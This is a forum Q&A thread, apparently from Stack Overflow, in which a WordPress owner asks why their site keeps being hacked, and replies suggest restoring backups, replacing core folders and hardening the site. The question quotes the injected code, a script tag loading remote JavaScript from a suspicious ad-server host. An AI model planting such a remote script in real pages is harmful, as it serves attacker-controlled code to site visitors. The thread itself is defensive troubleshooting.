# Wordpress website hacked AGAIN

Tags: javascript, wordpress, xss

Website has been hack twice now with the same issue i keep have to download the website and do a find and replace which fixes it but doesn't seem to solve my problem

this is the code they are inserting in the index.php file in wordpress which does have permissions set to 644.

```
<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script>
```

I am thinking it maybe a sql injection because all the files and folders are locked to the correct permissions 644 755 etc.

can somebodt tell me a mac SQL Injection test tool that i can use to test, i have been read another post and have change all my ftp accounts to sftp to secure that, is their anything else i am missing?

thanks

Comment: Are you using the lastest version of wordpress? How do you host this site? Is it on your own server or through a hosting company?

Comment: hi the site is being hosted on media temple by our client, i have also updated to the latest version off wordpress

Comment: are you using shared or vps hosting? Also what plugins and extended features are you using.

Comment: vps hosting various plugins would that be the issue?

Comment: Yes, could well be. Take a look at the server logs first as this might tell you what happened. This should be your first port of call.

Comment: If you're using the latest version of Wordpress, download a fresh copy and manually delete and replace /wp-admin/ and /wp-includes/ entirely. Some hackers might sneak a script into those folders that isn't deleted when Wordpress auto-updates.

Answer (score 1):

Find and replace is not such a great way to fix this as it's so easy to miss the things you don't know to specifically find.  A restore of a clean back up is the best way.  Using a v anti-virus plugin can help.  The last resort is to export your content via xml export and start all over . . .

Pro tip:

Look for PHP files where they shouldn't be, like in the uploads folder there should only be the index.php folder in there and it should only have the "// Silence is golden" c message in it.  If there is any other PHP file in there . . .

Good luck!

Answer (score -1):

There are many tools available here under 2 sections; Online and Download:
http://www.malwarehelp.org/freeware-open-source-commercial-website-security-tools-services-downloads.html

You can use this one on your mac too but it requires basic Perl installation.
http://www.cirt.net/nikto2

Answer (score -1):

Their entry point is almost certainly not FTP.  It's almost certifiably via a vulnerability in WordPress itself or a password hack of an easy password.

If you are fixing the hack instead of restoring a backup.  You are doing it wrong.  Make and store incremental backups, once a week should do it, depending on how often you update your content.  Don't forget to back up the database, in fact it's the most important.  You can always re upload an image or a plugin etc.

Sooooo....
Step one:  Restore website
Step two:  Change password to secure ones
Step three: Harden website with security plug ins
Step four:  Set up automated backups.

Good Luck!